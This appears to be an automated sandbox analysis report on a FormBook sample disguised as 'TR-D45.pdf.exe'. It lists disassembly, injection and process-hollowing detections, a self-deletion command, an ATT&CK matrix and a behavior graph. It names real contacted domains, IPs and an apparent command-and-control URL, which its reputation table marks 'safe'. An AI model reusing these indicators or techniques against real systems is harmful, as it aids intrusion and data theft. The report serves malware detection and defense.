      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044790AF mov eax, dword ptr fs:[00000030h]12_2_044790AF
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446F0BF mov ecx, dword ptr fs:[00000030h]12_2_0446F0BF
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446F0BF mov eax, dword ptr fs:[00000030h]12_2_0446F0BF
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446F0BF mov eax, dword ptr fs:[00000030h]12_2_0446F0BF
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445B944 mov eax, dword ptr fs:[00000030h]12_2_0445B944
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445B944 mov eax, dword ptr fs:[00000030h]12_2_0445B944
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04473D43 mov eax, dword ptr fs:[00000030h]12_2_04473D43
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B3540 mov eax, dword ptr fs:[00000030h]12_2_044B3540
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04457D50 mov eax, dword ptr fs:[00000030h]12_2_04457D50
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443C962 mov eax, dword ptr fs:[00000030h]12_2_0443C962
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B171 mov eax, dword ptr fs:[00000030h]12_2_0443B171
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B171 mov eax, dword ptr fs:[00000030h]12_2_0443B171
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445C577 mov eax, dword ptr fs:[00000030h]12_2_0445C577
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445C577 mov eax, dword ptr fs:[00000030h]12_2_0445C577
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439100 mov eax, dword ptr fs:[00000030h]12_2_04439100
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439100 mov eax, dword ptr fs:[00000030h]12_2_04439100
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439100 mov eax, dword ptr fs:[00000030h]12_2_04439100
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04508D34 mov eax, dword ptr fs:[00000030h]12_2_04508D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov eax, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov eax, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov eax, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov eax, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04454120 mov ecx, dword ptr fs:[00000030h]12_2_04454120
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04443D34 mov eax, dword ptr fs:[00000030h]12_2_04443D34
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443AD30 mov eax, dword ptr fs:[00000030h]12_2_0443AD30
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FE539 mov eax, dword ptr fs:[00000030h]12_2_044FE539
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446513A mov eax, dword ptr fs:[00000030h]12_2_0446513A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446513A mov eax, dword ptr fs:[00000030h]12_2_0446513A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044BA537 mov eax, dword ptr fs:[00000030h]12_2_044BA537
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04464D3B mov eax, dword ptr fs:[00000030h]12_2_04464D3B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04464D3B mov eax, dword ptr fs:[00000030h]12_2_04464D3B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04464D3B mov eax, dword ptr fs:[00000030h]12_2_04464D3B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov ecx, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6DC9 mov eax, dword ptr fs:[00000030h]12_2_044B6DC9
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B1E1 mov eax, dword ptr fs:[00000030h]12_2_0443B1E1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B1E1 mov eax, dword ptr fs:[00000030h]12_2_0443B1E1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443B1E1 mov eax, dword ptr fs:[00000030h]12_2_0443B1E1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044C41E8 mov eax, dword ptr fs:[00000030h]12_2_044C41E8
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444D5E0 mov eax, dword ptr fs:[00000030h]12_2_0444D5E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444D5E0 mov eax, dword ptr fs:[00000030h]12_2_0444D5E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FFDE2 mov eax, dword ptr fs:[00000030h]12_2_044FFDE2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FFDE2 mov eax, dword ptr fs:[00000030h]12_2_044FFDE2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FFDE2 mov eax, dword ptr fs:[00000030h]12_2_044FFDE2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FFDE2 mov eax, dword ptr fs:[00000030h]12_2_044FFDE2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044E8DF1 mov eax, dword ptr fs:[00000030h]12_2_044E8DF1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446A185 mov eax, dword ptr fs:[00000030h]12_2_0446A185
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445C182 mov eax, dword ptr fs:[00000030h]12_2_0445C182
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462581 mov eax, dword ptr fs:[00000030h]12_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462581 mov eax, dword ptr fs:[00000030h]12_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462581 mov eax, dword ptr fs:[00000030h]12_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462581 mov eax, dword ptr fs:[00000030h]12_2_04462581
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04432D8A mov eax, dword ptr fs:[00000030h]12_2_04432D8A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462990 mov eax, dword ptr fs:[00000030h]12_2_04462990
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446FD9B mov eax, dword ptr fs:[00000030h]12_2_0446FD9B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446FD9B mov eax, dword ptr fs:[00000030h]12_2_0446FD9B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044661A0 mov eax, dword ptr fs:[00000030h]12_2_044661A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044661A0 mov eax, dword ptr fs:[00000030h]12_2_044661A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044635A1 mov eax, dword ptr fs:[00000030h]12_2_044635A1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B69A6 mov eax, dword ptr fs:[00000030h]12_2_044B69A6
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04461DB5 mov eax, dword ptr fs:[00000030h]12_2_04461DB5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04461DB5 mov eax, dword ptr fs:[00000030h]12_2_04461DB5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04461DB5 mov eax, dword ptr fs:[00000030h]12_2_04461DB5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B51BE mov eax, dword ptr fs:[00000030h]12_2_044B51BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B51BE mov eax, dword ptr fs:[00000030h]12_2_044B51BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B51BE mov eax, dword ptr fs:[00000030h]12_2_044B51BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B51BE mov eax, dword ptr fs:[00000030h]12_2_044B51BE
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045005AC mov eax, dword ptr fs:[00000030h]12_2_045005AC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_045005AC mov eax, dword ptr fs:[00000030h]12_2_045005AC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439240 mov eax, dword ptr fs:[00000030h]12_2_04439240
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439240 mov eax, dword ptr fs:[00000030h]12_2_04439240
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439240 mov eax, dword ptr fs:[00000030h]12_2_04439240
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439240 mov eax, dword ptr fs:[00000030h]12_2_04439240
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04447E41 mov eax, dword ptr fs:[00000030h]12_2_04447E41
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FAE44 mov eax, dword ptr fs:[00000030h]12_2_044FAE44
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FAE44 mov eax, dword ptr fs:[00000030h]12_2_044FAE44
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044FEA55 mov eax, dword ptr fs:[00000030h]12_2_044FEA55
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044C4257 mov eax, dword ptr fs:[00000030h]12_2_044C4257
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444766D mov eax, dword ptr fs:[00000030h]12_2_0444766D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044EB260 mov eax, dword ptr fs:[00000030h]12_2_044EB260
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044EB260 mov eax, dword ptr fs:[00000030h]12_2_044EB260
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04508A62 mov eax, dword ptr fs:[00000030h]12_2_04508A62
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445AE73 mov eax, dword ptr fs:[00000030h]12_2_0445AE73
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0447927A mov eax, dword ptr fs:[00000030h]12_2_0447927A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443C600 mov eax, dword ptr fs:[00000030h]12_2_0443C600
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443C600 mov eax, dword ptr fs:[00000030h]12_2_0443C600
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443C600 mov eax, dword ptr fs:[00000030h]12_2_0443C600
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04468E00 mov eax, dword ptr fs:[00000030h]12_2_04468E00
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1608 mov eax, dword ptr fs:[00000030h]12_2_044F1608
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04448A0A mov eax, dword ptr fs:[00000030h]12_2_04448A0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04435210 mov eax, dword ptr fs:[00000030h]12_2_04435210
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04435210 mov ecx, dword ptr fs:[00000030h]12_2_04435210
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04435210 mov eax, dword ptr fs:[00000030h]12_2_04435210
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04435210 mov eax, dword ptr fs:[00000030h]12_2_04435210
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443AA16 mov eax, dword ptr fs:[00000030h]12_2_0443AA16
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443AA16 mov eax, dword ptr fs:[00000030h]12_2_0443AA16
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04453A1C mov eax, dword ptr fs:[00000030h]12_2_04453A1C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446A61C mov eax, dword ptr fs:[00000030h]12_2_0446A61C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446A61C mov eax, dword ptr fs:[00000030h]12_2_0446A61C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0443E620 mov eax, dword ptr fs:[00000030h]12_2_0443E620
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04474A2C mov eax, dword ptr fs:[00000030h]12_2_04474A2C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04474A2C mov eax, dword ptr fs:[00000030h]12_2_04474A2C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044EFE3F mov eax, dword ptr fs:[00000030h]12_2_044EFE3F
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04478EC7 mov eax, dword ptr fs:[00000030h]12_2_04478EC7
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04508ED6 mov eax, dword ptr fs:[00000030h]12_2_04508ED6
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044636CC mov eax, dword ptr fs:[00000030h]12_2_044636CC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462ACB mov eax, dword ptr fs:[00000030h]12_2_04462ACB
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044EFEC0 mov eax, dword ptr fs:[00000030h]12_2_044EFEC0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04462AE4 mov eax, dword ptr fs:[00000030h]12_2_04462AE4
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044616E0 mov ecx, dword ptr fs:[00000030h]12_2_044616E0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044476E2 mov eax, dword ptr fs:[00000030h]12_2_044476E2
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CFE87 mov eax, dword ptr fs:[00000030h]12_2_044CFE87
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446D294 mov eax, dword ptr fs:[00000030h]12_2_0446D294
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446D294 mov eax, dword ptr fs:[00000030h]12_2_0446D294
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044352A5 mov eax, dword ptr fs:[00000030h]12_2_044352A5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044352A5 mov eax, dword ptr fs:[00000030h]12_2_044352A5
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044352A5 mov eax, dword ptr fs:[00000030h]12_2_044352A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 54.147.194.143 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeThread register set: target process: 3472Jump to behavior
      Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3472Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 180000Jump to behavior
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeProcess created: C:\Users\user\Desktop\TR-D45.pdf.exe 'C:\Users\user\Desktop\TR-D45.pdf.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TR-D45.pdf.exe'Jump to behavior
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
      Source: explorer.exe, 00000005.00000000.278658305.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
      Source: explorer.exe, 00000005.00000000.278878315.0000000001640000.00000002.00000001.sdmp, control.exe, 0000000C.00000002.495739945.0000000002CD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6660, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: TR-D45.pdf.exe PID: 3668, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1Credential API Hooking1Security Software Discovery721Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit1LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion22Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information13Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321007 Sample: TR-D45.pdf.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 29 g.msn.com 2->29 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 9 other signatures 2->45 11 TR-D45.pdf.exe 1 2->11         started        signatures3 process4 signatures5 55 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->55 57 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 11->57 59 Tries to detect Any.run 11->59 61 3 other signatures 11->61 14 TR-D45.pdf.exe 6 11->14         started        process6 dnsIp7 37 pilatescollective.com 192.185.152.65, 443, 49718 UNIFIEDLAYER-AS-1US United States 14->37 63 Modifies the context of a thread in another process (thread injection) 14->63 65 Tries to detect Any.run 14->65 67 Maps a DLL or memory area into another process 14->67 69 3 other signatures 14->69 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 31 gcvinternational.com 34.102.136.180, 49743, 80 GOOGLEUS United States 18->31 33 www.celebrations.sucks 54.147.194.143, 49745, 80 AMAZON-AESUS United States 18->33 35 2 other IPs or domains 18->35 47 System process connects to network (likely due to code injection or exploit) 18->47 22 control.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      TR-D45.pdf.exe29%VirustotalBrowse
      TR-D45.pdf.exe15%ReversingLabsWin32.Trojan.Bulz

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://cps.letsencrypt.org00%URL Reputationsafe
      http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
      http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
      http://ocsp.int-x3.letsencrypt.org0/0%URL Reputationsafe
      http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
